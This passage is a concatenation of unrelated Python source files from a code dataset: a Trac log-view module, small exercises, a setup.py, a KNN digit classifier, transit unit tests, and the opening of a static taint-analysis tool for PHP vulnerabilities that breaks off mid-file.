Hackercup/45:Fighting the Zombie.py","file_name":"45:Fighting the Zombie.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"586898526","text":"# -*- coding: iso8859-1 -*-\n#\n# Copyright (C) 2003-2005 Edgewall Software\n# Copyright (C) 2003-2005 Jonas Borgström \n# All rights reserved.\n#\n# This software is licensed as described in the file COPYING, which\n# you should have received as part of this distribution. The terms\n# are also available at http://trac.edgewall.com/license.html.\n#\n# This software consists of voluntary contributions made by many\n# individuals. For the exact contribution history, see the revision\n# history and logs, available at http://projects.edgewall.com/trac/.\n#\n# Author: Jonas Borgström \n# Christian Boos \n\nfrom __future__ import generators\nimport re\nimport urllib\n\nfrom trac import util\nfrom trac.core import *\nfrom trac.perm import IPermissionRequestor\nfrom trac.web import IRequestHandler\nfrom trac.web.chrome import add_link, add_stylesheet, INavigationContributor\nfrom trac.wiki import IWikiSyntaxProvider\nfrom trac.versioncontrol import Changeset\nfrom trac.versioncontrol.web_ui.util import *\n\nLOG_LIMIT = 100\n\nclass LogModule(Component):\n\n implements(INavigationContributor, IPermissionRequestor, IRequestHandler,\n IWikiSyntaxProvider)\n\n # INavigationContributor methods\n\n def get_active_navigation_item(self, req):\n return 'browser'\n\n def get_navigation_items(self, req):\n return []\n\n # IPermissionRequestor methods\n\n def get_permission_actions(self):\n return ['LOG_VIEW']\n\n # IRequestHandler methods\n\n def match_request(self, req):\n import re\n match = re.match(r'/log(?:(/.*)|$)', req.path_info)\n if match:\n req.args['path'] = match.group(1) or '/'\n return 1\n\n def process_request(self, req):\n req.perm.assert_permission('LOG_VIEW')\n\n mode = req.args.get('mode', 'stop_on_copy')\n path = req.args.get('path', '/')\n rev = req.args.get('rev')\n format = req.args.get('format')\n stop_rev = req.args.get('stop_rev')\n verbose = req.args.get('verbose')\n limit = LOG_LIMIT\n\n req.hdf['title'] = path + ' (log)'\n req.hdf['log'] = {\n 'mode': mode,\n 'path': path,\n 'rev': rev,\n 'verbose': verbose,\n 'stop_rev': stop_rev,\n 'browser_href': self.env.href.browser(path),\n 'log_href': self.env.href.log(path, rev=rev)\n }\n\n path_links = get_path_links(self.env.href, path, rev)\n req.hdf['log.path'] = path_links\n if path_links:\n add_link(req, 'up', path_links[-1]['href'], 'Parent directory')\n\n repos = self.env.get_repository(req.authname)\n normpath = repos.normalize_path(path)\n rev = str(repos.normalize_rev(rev))\n\n # ''Node history'' uses `Node.history()`,\n # ''Path history'' uses `Repository.get_path_history()`\n if mode == 'path_history':\n def history(limit):\n for h in repos.get_path_history(path, rev, limit):\n yield h\n else:\n history = get_existing_node(self.env, repos, path, rev).get_history\n\n # -- retrieve history, asking for limit+1 results\n info = []\n previous_path = repos.normalize_path(path)\n for old_path, old_rev, old_chg in history(limit+1):\n if stop_rev and repos.rev_older_than(old_rev, stop_rev):\n break\n old_path = repos.normalize_path(old_path)\n item = {\n 'rev': str(old_rev),\n 'path': str(old_path),\n 'log_href': self.env.href.log(old_path, rev=old_rev),\n 'browser_href': self.env.href.browser(old_path, rev=old_rev),\n 'changeset_href': self.env.href.changeset(old_rev),\n 'change': old_chg\n }\n if not (mode == 'path_history' and old_chg == Changeset.EDIT):\n info.append(item)\n if old_path and old_path != previous_path \\\n and not (mode == 'path_history' and old_path == normpath):\n item['copyfrom_path'] = old_path\n if mode == 'stop_on_copy':\n break\n if len(info) > limit: # we want limit+1 entries\n break\n previous_path = old_path\n if info == []:\n # FIXME: we should send a 404 error here\n raise TracError(\"The file or directory '%s' doesn't exist \"\n \"at revision %s or at any previous revision.\"\n % (path, rev), 'Nonexistent path')\n\n def make_log_href(path, **args):\n link_rev = rev\n if rev == str(repos.youngest_rev):\n link_rev = None\n params = {'rev': link_rev, 'mode': mode, 'limit': limit}\n params.update(args)\n if verbose:\n params['verbose'] = verbose\n return self.env.href.log(path, **params)\n\n if len(info) == limit+1: # limit+1 reached, there _might_ be some more\n next_rev = info[-1]['rev']\n next_path = info[-1]['path']\n add_link(req, 'next', make_log_href(next_path, rev=next_rev),\n 'Revision Log (restarting at %s, rev. %s)'\n % (next_path, next_rev))\n # now, only show 'limit' results\n del info[-1]\n \n req.hdf['log.items'] = info\n\n changes = get_changes(self.env, repos, [i['rev'] for i in info],\n verbose, req, format)\n if format == 'rss':\n # Get the email addresses of all known users\n email_map = {}\n for username,name,email in self.env.get_known_users():\n if email:\n email_map[username] = email\n for cs in changes.values():\n cs['message'] = util.escape(cs['message'])\n cs['shortlog'] = util.escape(cs['shortlog'].replace('\\n', ' '))\n # For RSS, author must be an email address\n author = cs['author']\n author_email = ''\n if '@' in author:\n author_email = author\n elif email_map.has_key(author):\n author_email = email_map[author]\n cs['author'] = author_email\n cs['date'] = util.http_date(cs['date_seconds'])\n elif format == 'changelog':\n for cs in changes.values():\n cs['message'] = '\\n'.join(['\\t' + m for m in\n cs['message'].split('\\n')])\n req.hdf['log.changes'] = changes\n\n if req.args.get('format') == 'changelog':\n return 'log_changelog.cs', 'text/plain'\n elif req.args.get('format') == 'rss':\n return 'log_rss.cs', 'application/rss+xml'\n\n add_stylesheet(req, 'common/css/browser.css')\n add_stylesheet(req, 'common/css/diff.css')\n\n rss_href = make_log_href(path, format='rss', stop_rev=stop_rev)\n add_link(req, 'alternate', rss_href, 'RSS Feed', 'application/rss+xml',\n 'rss')\n changelog_href = make_log_href(path, format='changelog',\n stop_rev=stop_rev)\n add_link(req, 'alternate', changelog_href, 'ChangeLog', 'text/plain')\n\n return 'log.cs', None\n\n # IWikiSyntaxProvider methods\n \n def get_wiki_syntax(self):\n yield (r\"!?\\[\\d+:\\d+\\]|(?:\\b|!)r\\d+:\\d+\\b\",\n lambda x, y, z: self._format_link(x, 'log',\n '#'+(y[0] == 'r' and y[1:]\n or y[1:-1]), y))\n\n def get_link_resolvers(self):\n yield ('log', self._format_link)\n\n def _format_link(self, formatter, ns, path, label):\n path, rev, line = get_path_rev_line(path)\n stop_rev = None\n if rev and ':' in rev:\n stop_rev, rev = rev.split(':', 1)\n label = urllib.unquote(label)\n return '%s' \\\n % (formatter.href.log(path, rev=rev, stop_rev=stop_rev), label)\n","sub_path":"0.9-0beta2+r2418-1/trac/versioncontrol/web_ui/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"3203646","text":"#!/usr/bin/python3\n\nfrom pyrob.api import *\n\n\n@task\ndef task_7_5():\n goal = 0\n now = 0\n move_right()\n fill_cell()\n while not wall_is_on_the_right():\n if now > goal:\n fill_cell()\n now = 0\n goal += 1\n now += 1\n move_right()\n\n\nif __name__ == '__main__':\n run_tasks()\n","sub_path":"task_27.py","file_name":"task_27.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"605131160","text":"# -*- coding: utf-8 -*-\n#-##########################################################################-#\n#\n# xooof - http://www.xooof.org\n# A development and XML specification framework for documenting and\n# developing the services layer of enterprise business applications.\n# From the specifications, it generates WSDL, DocBook, client-side and\n# server-side code for Java, C# and Python.\n#\n# Copyright (C) 2006 Software AG Belgium\n#\n# This file is part of xooof.\n#\n# xooof is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation; either version 2 of the License, or (at\n# your option) any later version.\n#\n# xooof is distributed in the hope that it will be useful, but WITHOUT\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n# for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n#-##########################################################################-#\nfrom setuptools import setup, find_packages\nimport os\n\nversion = '0.1.1'\n\nsetup(name='xooof.schema.dev',\n version=version,\n description=\"The zope schema parts of the xooof runtime development\" \\\n \" tools for python\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n classifiers=[\n \"Framework :: Plone\",\n \"Framework :: Zope2\",\n \"Framework :: Zope3\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords='',\n author='Laurent Mignon',\n author_email='laurent.mignon__at__softwareag.com',\n url='http://sourceforge.net/projects/xooof/',\n license='GNU Lesser General Public License',\n package_dir={'': 'src'},\n packages=find_packages('src'),\n namespace_packages=['xooof', 'xooof.schema'],\n include_package_data=True,\n zip_safe=False,\n dependency_links = [\n ],\n install_requires=[\n 'setuptools',\n 'xooof.spectools',\n 'i18ndude >=3.0b4, <4',\n ],\n entry_points= {\n 'console_scripts':\n ['struct2zschema = xooof.schema.dev.structtozschema:main',\n 'struct2po = xooof.schema.dev.structtopo:main']},\n )\n","sub_path":"pypi_install_script/xooof.schema.dev-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"521360112","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 19 21:28:59 2017\n\n@author: yuanqi\n\nStupid KNN Version.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport time\n\ndef get_eig(data_mat):\n \"\"\"\n 返回特征值和特征向量\n \"\"\"\n mean_vals = np.mean(data_mat, axis = 0)\n mean_removed = data_mat - mean_vals\n cov_mat = np.cov(mean_removed, rowvar = 0)\n eigvals, eigvects = np.linalg.eig(np.mat(cov_mat)) \n return eigvals, eigvects\n \ndef pca(data_mat, acc = 0.99):\n \"\"\"\n 降维:返回降维后的矩阵和特征向量(事实证明降维效果太差了, 0.99的精确度降到了710维)\n \"\"\"\n mean_vals = np.mean(data_mat, axis = 0)\n mean_removed = data_mat - mean_vals\n eigvals, eigvects = get_eig(data_mat)\n eigval_ind = np.argsort(eigvals)\n var_vals = np.var(data_mat, axis = 0)\n var_vals = np.array(var_vals)[0]\n sum_var_vals = sum(var_vals)\n feature_num = None\n tmp_sum = 0.\n for i in range(data_mat.shape[1]):\n tmp_sum += var_vals[i]\n if tmp_sum / sum_var_vals > acc:\n feature_num = i\n break\n\n eigval_ind = eigval_ind[:-(feature_num + 1): -1] \n red_eig_vects = eigvects[:, eigval_ind] \n low_data_mat = mean_removed * red_eig_vects\n return low_data_mat,red_eig_vects\n \ndef low_input_vec(low_data_mat, eig_vects, input_vec):\n \"\"\"\n 返回降维后的输入变量\n \"\"\"\n mean = np.mean(input_vec)\n mean_removed = input_vec - mean\n ret_vec = mean_removed * eig_vects\n return ret_vec\n\ndef load_data_set(filename = '../input/train.csv', train_propotion = 1.0):\n \"\"\"\n filename: 训练集路径\n train_propotion: 验证集所占比例 \n 返回训练集和验证集\n \"\"\"\n train_set = pd.read_csv('../input/train.csv')\n train_num = int(train_set.shape[0] * train_propotion)\n \n label = np.array(train_set.iloc[:, 0])\n pixel_mat = np.array(train_set.iloc[:, 1:])\n \n train_label = label[:train_num]\n train_pixel_mat = pixel_mat[:train_num]\n \n valid_label = label[train_num:]\n valid_pixel_mat = pixel_mat[train_num:]\n\n return train_pixel_mat, train_label, valid_pixel_mat, valid_label\n \ndef load_test_set(filename = '../input/test.csv'):\n \"\"\"\n 返回测试集\n \"\"\"\n test_set = pd.read_csv(filename) \n pixel_mat = np.array(test_set.iloc[:,:])\n return pixel_mat\n \n\ndef knn(pixel_mat, label, input_vec, k = 10):\n \"\"\"\n 返回分类结果\n \"\"\"\n dist = []\n for pixel_row in pixel_mat:\n euclidean_dist = np.sqrt(sum(np.square(input_vec - pixel_row))) # 计算欧式距离\n dist.append(euclidean_dist)\n \n label_dist_pair = list(zip(label, dist))\n label_dist_pair.sort(key = lambda i: i[1])\n \n top_k = np.array(label_dist_pair[:k])\n label_set = set(top_k[:,0])\n label_count = dict(zip(label_set, [0] * len(label_set)))\n for item in top_k:\n label_count[item[0]] += 1\n label = max(label_count.items(), key = lambda item: item[1])[0]\n return int(label)#, label_count\n\ndef generate_pic(input_vec, filename):\n \"\"\"\n 根据输入向量产生图片\n \"\"\"\n data_mat = []\n for i in range(0, input_vec.shape[0], 28):\n data_mat.append(input_vec[i:i+28]) \n img = Image.fromarray(np.array(np.uint8(data_mat)))\n img.save(filename)\n\ndef validate(train_pixel_mat, train_label, valid_pixel_mat, valid_label): \n right_predict = 0. \n for i, valid_item in enumerate(valid_pixel_mat):\n label = knn(train_pixel_mat, train_label, valid_item)\n print (label, valid_label[i])\n if label == valid_label[i]:\n right_predict += 1.\n acc = right_predict / valid_pixel_mat.shape[0] \n return acc\n\ndef test(test_pixel_mat, train_pixel_mat, train_label, filename=\"result.csv\"):\n \"\"\"\n 生成训练结果保存为csv文件\n \"\"\"\n f = open(filename, \"w\")\n f.write(\"ImageId,Label\\n\")\n for i, item in enumerate(test_pixel_mat):\n label = knn(train_pixel_mat, train_label, item)\n #print(\"{0},{1}\".format(i + 1, label))\n f.write(\"{0},{1}\\n\".format(i + 1, label))\n\nif __name__ == \"__main__\":\n start = time.time()\n train_pixel_mat, train_label, valid_pixel_mat, valid_label = load_data_set()\n #acc = validate(train_pixel_mat, train_label, valid_pixel_mat, valid_label)\n #print (acc)\n test_pixel_mat = load_test_set()\n \n #train_pixel_mat = pca(train_pixel_mat)\n #valid_pixel_mat = pca(valid_pixel_mat) \n #test_pixel_mat = pca(test_pixel_mat)\n \n #test(test_pixel_mat, train_pixel_mat, train_label, filename=\"result.csv\")\n end = time.time()\n print (start - end)\n ","sub_path":"digit-recognizer/code/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"49162877","text":"import unittest\nfrom unittest import mock\nfrom transiter.utils import servicepatternmanager\nfrom transiter.utils import gtfsstaticutil\nfrom transiter.utils import graphutils\nfrom transiter import models\n\n\nclass TestServicePatternManager(unittest.TestCase):\n def setUp(self):\n\n self.trip_one = gtfsstaticutil.StaticTrip()\n self.trip_one.stop_ids = []\n self.trip_one.route_id = 'C'\n self.trip_two = gtfsstaticutil.StaticTrip()\n self.trip_two.stop_ids = ['1', '2']\n self.trip_two.route_id = 'A'\n self.trip_two.direction_id = False\n self.trip_three = gtfsstaticutil.StaticTrip()\n self.trip_three.stop_ids = ['3', '4']\n self.trip_three.route_id = 'A'\n self.trip_three.direction_id = True\n\n @mock.patch('transiter.utils.servicepatternmanager.graphutils')\n def test_path_lists_to_sorted_graph__empty_list(self, graphutils):\n \"\"\"[Service pattern manager] Empty path list to sorted graph\"\"\"\n graph = mock.MagicMock()\n graphutils.graphdatastructs.DirectedPath.return_value = graph\n\n actual = servicepatternmanager._path_lists_to_sorted_graph([])\n\n self.assertEqual(graph, actual)\n\n graphutils.graphdatastructs.DirectedPath.assert_called_once_with([])\n\n @mock.patch('transiter.utils.servicepatternmanager.graphutils')\n def test_path_lists_to_sorted_graph__single_list(self, graphutils):\n \"\"\"[Service pattern manager] Single path list to sorted graph\"\"\"\n path_list = mock.MagicMock()\n path_lists = [path_list]\n graph = mock.MagicMock()\n graphutils.graphdatastructs.DirectedPath.return_value = graph\n\n actual = servicepatternmanager._path_lists_to_sorted_graph(path_lists)\n\n self.assertEqual(graph, actual)\n\n graphutils.graphdatastructs.DirectedPath.assert_called_once_with(path_list)\n\n def test_sorted_graph_to_service_pattern(self):\n \"\"\"[Service pattern manager] Sorted graph to service pattern\"\"\"\n label_one = '1'\n label_two = '2'\n path_list = [label_one, label_two]\n graph = graphutils.graphdatastructs.DirectedPath(path_list)\n\n stop_one = mock.MagicMock()\n stop_two = mock.MagicMock()\n label_to_stop = {\n label_one: stop_one,\n label_two: stop_two\n }\n\n expected_sp = models.ServicePattern()\n v_one = models.ServicePatternVertex()\n v_one.stop = stop_one\n v_one.service_pattern = expected_sp\n v_one.position = 0\n v_two = models.ServicePatternVertex()\n v_two.stop = stop_two\n v_two.service_pattern = expected_sp\n v_two.position = 1\n\n actual_sp = servicepatternmanager._sorted_graph_to_service_pattern(\n graph, label_to_stop)\n\n self.assertEqual(expected_sp, actual_sp)\n self.assertEqual(expected_sp.vertices, actual_sp.vertices)\n\n @mock.patch('transiter.utils.servicepatternmanager.graphutils')\n def test_path_lists_to_sorted_graph__stiches_to_path(self, graphutils):\n \"\"\"[Service pattern manager] Two path lists to sorted graph, just from stitching\"\"\"\n path_list_one = mock.MagicMock()\n path_list_two = mock.MagicMock()\n path_lists = [path_list_one, path_list_two]\n\n directed_path_one = mock.MagicMock()\n directed_path_two = mock.MagicMock()\n\n def DirectedPath(path_list):\n if path_list == path_list_one:\n return directed_path_one\n if path_list == path_list_two:\n return directed_path_two\n raise AttributeError\n\n graphutils.graphdatastructs.DirectedPath.side_effect = DirectedPath\n\n graph = mock.MagicMock()\n graphutils.pathstitcher.stitch.return_value = graph\n graph.is_path.return_value = True\n final_graph = mock.MagicMock()\n graph.cast_to_path.return_value = final_graph\n\n actual = servicepatternmanager._path_lists_to_sorted_graph(path_lists)\n\n self.assertEqual(final_graph, actual)\n\n graphutils.graphdatastructs.DirectedPath.assert_any_call(path_list_two)\n graphutils.graphdatastructs.DirectedPath.assert_any_call(path_list_one)\n graphutils.pathstitcher.stitch.assert_called_once_with([directed_path_one, directed_path_two])\n graph.is_path.assert_called_once_with()\n graph.cast_to_path.assert_called_once_with()\n graphutils.topologicalsort.sort.assert_not_called()\n\n\n @mock.patch('transiter.utils.servicepatternmanager.graphutils')\n def test_path_lists_to_sorted_graph__topological_sort(self, graphutils):\n \"\"\"[Service pattern manager] Two path lists to sorted graph, from top sort\"\"\"\n path_list_one = mock.MagicMock()\n path_list_two = mock.MagicMock()\n path_lists = [path_list_one, path_list_two]\n\n directed_path_one = mock.MagicMock()\n directed_path_two = mock.MagicMock()\n\n def DirectedPath(path_list):\n if path_list == path_list_one:\n return directed_path_one\n if path_list == path_list_two:\n return directed_path_two\n raise AttributeError\n\n graphutils.graphdatastructs.DirectedPath.side_effect = DirectedPath\n\n graph = mock.MagicMock()\n graphutils.pathstitcher.stitch.return_value = graph\n graph.is_path.return_value = False\n final_graph = mock.MagicMock()\n graphutils.topologicalsort.sort.return_value = final_graph\n\n actual = servicepatternmanager._path_lists_to_sorted_graph(path_lists)\n\n self.assertEqual(final_graph, actual)\n\n graphutils.graphdatastructs.DirectedPath.assert_any_call(path_list_two)\n graphutils.graphdatastructs.DirectedPath.assert_any_call(path_list_one)\n graphutils.pathstitcher.stitch.assert_called_once_with([directed_path_one, directed_path_two])\n graph.is_path.assert_called_once_with()\n graph.cast_to_path.assert_not_called()\n graphutils.topologicalsort.sort.assert_called_with(graph)\n\n @mock.patch('transiter.utils.servicepatternmanager._path_lists_to_sorted_graph')\n @mock.patch('transiter.utils.servicepatternmanager._sorted_graph_to_service_pattern')\n def test_construct_for_static_trips(self, _sg_to_sp, _pls_to_sg):\n trips = [self.trip_one, self.trip_two, self.trip_three]\n\n stop_id_to_stop = mock.MagicMock()\n\n sorted_graph = mock.MagicMock()\n _pls_to_sg.return_value = sorted_graph\n service_pattern = mock.MagicMock()\n _sg_to_sp.return_value = service_pattern\n\n actual = servicepatternmanager._construct_for_static_trips(\n trips, stop_id_to_stop, {})\n\n self.assertEqual(service_pattern, actual)\n\n _pls_to_sg.assert_called_once_with({('1', '2'), ('3', '4')})\n _sg_to_sp.assert_called_once_with(sorted_graph, stop_id_to_stop)\n\n\n @mock.patch('transiter.utils.servicepatternmanager._filter_trips_by_conditions')\n @mock.patch('transiter.utils.servicepatternmanager._construct_for_static_trips')\n def test_construct_sps_from_gtfs_static_date(self, _filter_trips, _construct):\n\n gtfs_static_parser = gtfsstaticutil.GtfsStaticParser()\n route = mock.MagicMock()\n gtfs_static_parser.route_id_to_route = {\n 'A': route\n }\n gtfs_static_parser.trip_id_to_trip = {\n '1': self.trip_one,\n '2': self.trip_two,\n '3': self.trip_three,\n }\n gtfs_static_parser.stop_id_to_stop = mock.MagicMock()\n\n conditions = mock.MagicMock()\n route_sp_settings = [\n {\n 'name': 'Name 1',\n 'default': True,\n },\n {\n 'name': 'Name 2',\n 'regular': True,\n 'conditions': conditions\n }\n ]\n\n servicepatternmanager.construct_sps_from_gtfs_static_data(\n gtfs_static_parser, route_sp_settings)\n\n self.assertEqual(self.trip_two.stop_ids, ['1', '2'])\n self.assertEqual(self.trip_three.stop_ids, ['4', '3'])\n # TODO add more assertions here\n # Test the names were copied over\n # Test that the right trips were used to construct by filtering in one\n\nclass TestTripsFilter(unittest.TestCase):\n @mock.patch('transiter.utils.servicepatternmanager._TripMatcher')\n def test_filter_trips_by_conditions(self, _TripMatcher):\n trip_matcher = mock.MagicMock()\n _TripMatcher.return_value = trip_matcher\n trip_matcher.match.side_effect = self._dummy_match\n\n good_trips = [self._create_trip(0) for __ in range(10)]\n bad_trips = [self._create_trip(20) for __ in range(10)]\n ugly_trips = [self._create_trip(7) for __ in range(1)]\n\n actual_trips = servicepatternmanager._filter_trips_by_conditions(\n good_trips + bad_trips + ugly_trips, 0.2, None\n )\n\n self.assertListEqual(actual_trips, good_trips)\n\n @staticmethod\n def _dummy_match(trip):\n return trip.stop_ids[0] < 10\n\n @staticmethod\n def _create_trip(key):\n trip = mock.MagicMock()\n trip.stop_ids = [key, 100]\n return trip\n\n\nclass TestTripMatcher(unittest.TestCase):\n\n def setUp(self):\n self.early_weekday_trip = self._create_trip({\n 'start_time': 6,\n 'end_time': 8,\n 'monday': True,\n 'route_id': 'A'\n })\n\n self.mid_weekday_trip = self._create_trip({\n 'start_time': 12,\n 'end_time': 14,\n 'tuesday': True,\n 'route_id': 'A'\n })\n\n self.late_weekday_trip = self._create_trip({\n 'start_time': 22,\n 'end_time': 23,\n 'wednesday': True,\n 'route_id': 'B'\n })\n\n self.early_weekend_trip = self._create_trip({\n 'start_time': 6,\n 'end_time': 8,\n 'sunday': True,\n 'route_id': 'C'\n })\n\n self.trips = [\n self.early_weekday_trip,\n self.mid_weekday_trip,\n self.late_weekday_trip,\n self.early_weekend_trip]\n\n def test_one(self):\n raw_conds = {\n \"weekday\": True,\n \"one_of\": {\n \"starts_earlier_than\": 7,\n \"starts_later_than\": 20\n }\n }\n expected_trips = [self.early_weekday_trip, self.late_weekday_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_two(self):\n raw_conds = {\n \"all_of\": {\n \"starts_earlier_than\": 7,\n \"starts_later_than\": 7.01\n }\n }\n expected_trips = []\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_three(self):\n raw_conds = {\n \"weekday\": True,\n \"starts_later_than\": 7,\n \"starts_earlier_than\": 20\n }\n expected_trips = [self.mid_weekday_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_four(self):\n raw_conds = {\n \"none_of\": {\n \"ends_later_than\": 13,\n }\n }\n expected_trips = [self.early_weekday_trip, self.early_weekend_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_five(self):\n raw_conds = {\n \"all_of\": {\n \"ends_earlier_than\": 11,\n \"weekday\": True,\n }\n }\n expected_trips = [self.early_weekday_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_six(self):\n raw_conds = {\n \"weekend\": True\n }\n expected_trips = [self.early_weekend_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_seven(self):\n raw_conds = {\n 'route_id': 'A'\n }\n expected_trips = [self.early_weekday_trip, self.mid_weekday_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_eight(self):\n raw_conds = {\n 'route_id': ['B', 'C']\n }\n expected_trips = [self.late_weekday_trip, self.early_weekend_trip]\n\n matched_trips = self._trip_matcher_runner(raw_conds, self.trips)\n\n self.assertListEqual(matched_trips, expected_trips)\n\n def test_nine(self):\n raw_conds = {\n 'unknown_condition': True\n }\n\n self.assertRaises(\n NotImplementedError,\n self._trip_matcher_runner,\n raw_conds,\n self.trips)\n\n\n @staticmethod\n def _trip_matcher_runner(raw_conds, trips):\n trips_matcher = servicepatternmanager._TripMatcher(raw_conds)\n matched_trips = []\n for trip in trips:\n if trips_matcher.match(trip):\n matched_trips.append(trip)\n return matched_trips\n\n @staticmethod\n def _create_trip(attrs):\n trip = gtfsstaticutil.StaticTrip()\n for day in gtfsstaticutil.days:\n trip.__setattr__(day, False)\n for key, value in attrs.items():\n trip.__setattr__(key, value)\n return trip\n\n","sub_path":"tests/unittests/utils/test_servicepatternmanager.py","file_name":"test_servicepatternmanager.py","file_ext":"py","file_size_in_byte":13605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"405179723","text":"people_in_jury = int(input())\npresentation_name = input()\ntotal_presentations = 0\ntotal_scores = 0\n\nwhile presentation_name != \"Finish\":\n scores = 0\n for n in range(1, people_in_jury + 1):\n scores += float(input())\n\n final_score = scores / people_in_jury\n\n print(f\"{presentation_name} - {final_score:.2f}.\")\n total_presentations += 1\n total_scores += final_score\n presentation_name = input()\nelse:\n print(\n f\"Student's final assessment is {total_scores / total_presentations:.2f}.\")\n","sub_path":"Programing Basics Python/Exam Preparations/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15712773","text":"import sys\nimport json\nfrom itertools import islice\nfrom pprint import pprint\n\nfrom Vulnerable import Vulnerable\nfrom getters import *\n\n\ndef id_nodes(ast):\n\tid = 0\n\tstack = [ast]\n\t\n\twhile stack:\n\t\tnode = stack.pop()\n\t\tnode['id'] = id\n\t\tid += 1\n\t\t\n\t\tfor k, v in node.iteritems():\n\t\t\tif isinstance(v, dict):\n\t\t\t\tstack.append(v)\n\t\t\t\t\n\t\t\telif isinstance(v, list):\n\t\t\t\tfor n in v:\n\t\t\t\t\tstack.append(n)\n\t\n\treturn ast\n\n\n# returns a list of vulnerability patterns\ndef get_patterns(file_dir, display = False):\n\tprint(\"importing vulnerability patterns from\" + file_dir)\n\twith open(file_dir, 'r') as fp:\n\t\tpatterns = []\n\t\t\n\t\twhile True:\n\t\t\tfield = list(islice(fp, 5))\n\t\t\t\n\t\t\tif field:\n\t\t\t\tfield = [x for x in field if x !='\\n']\t\t\n\t\t\t\tpattern = Vulnerable(field[0], field[1].split(','), field[2].split(','), field[3].split(','))\n\t\t\t\tpatterns.append(pattern)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\n\t\treturn patterns\n\n\ndef path_from_sink_to_entry(ast, node, patterns):\n\t\n\tif node['kind'] == \"call\":\n\t\t\n\t\t# check if function is a sanitization function\n\t\tfor pattern in patterns:\n\t\t\tif node['what']['name'] in pattern.validation_funcs:\n\t\t\t\treturn None\n\t\t\n\t\tfor arg in node['arguments']:\n\t\t\tpath = path_from_sink_to_entry(ast, arg, patterns)\n\t\t\tif path is not None:\n\t\t\t\tpath.append(node['what']['name'])\n\t\t\t\treturn path\n\t\t\t\t\n\telif node['kind'] == \"echo\":\n\t\t#TODO maybe add more functions like echo\n\t\tfor arg in node['expressions']:\n\t\t\tpath = path_from_sink_to_entry(ast, arg, patterns)\n\t\t\tif path is not None:\n\t\t\t\tpath.append(node['kind'])\n\t\t\t\treturn path\n\t\t\n\t\t\n\telif node['kind'] == \"offsetlookup\":\n\t\t# check if variable is an entry point\n\t\tfor pattern in patterns:\n\t\t\tif node['what']['name'] in pattern.entry_points:\n\t\t\t\tentry = node['what']['name'] + \"['\" + node['offset']['value'] + \"']\"\n\t\t\t\t\n\t\t\t\treturn [entry]\n\t\t\n\t\t\n\telif node['kind'] == \"variable\":\n\t\tassign = get_assignment(ast, node)\n\t\tprint(\"das\")\n\t\tprint(assign)\n\t\tif assign is not None:\n\t\t\tpath = path_from_sink_to_entry(ast, assign['right'], patterns)\n\t\t\t\n\t\t\tif path is not None:\n\t\t\t\tpath.append(node['name'])\n\t\t\t\treturn path\n\t\t\n\t\t\n\telif node['kind'] == \"if\":\n\t\tprint(\"no if is implemented\")\n\t\t\n\t\t\n\telif node['kind'] == \"while\":\n\t\tprint(\"no while is implemented\")\n\t\t\n\t\t\n\telse:\n\t\tnodesOfInterest = get_functions(node) + get_variables(node)\n\t\tfor n in nodesOfInterest:\n\t\t\tpath = path_from_sink_to_entry(ast, n, patterns)\n\t\t\tif path is not None:\n\t\t\t\treturn path\n\t\n\t# default return null\n\treturn None\n\n\n\ndef check_vulnerability(file_dir, patterns):\n\n\tprint(\"analyzing \" + file_dir)\n\twith open(file_dir) as fp:\n\t\tast = json.load(fp)\n\t\n\tfunctions = get_functions(ast)\n\tsinks = []\n\tsubpatterns = []\n\tfor pattern in patterns:\n\t\tfor function in functions:\n\t\t\tif function not in sinks:\n\t\t\t\tif function['kind'] == \"call\":\n\t\t\t\t\tname = function['what']['name']\n\t\t\t\telse:\n\t\t\t\t\tname = function['kind']\n\t\t\t\t\t\n\t\t\t\tif name in pattern.sensitive_sinks:\n\t\t\t\t\tsinks.append(function)\n\t\t\t\t\tsubpatterns.append(pattern)\n\n\t# id the AST nodes to distinguish x=x 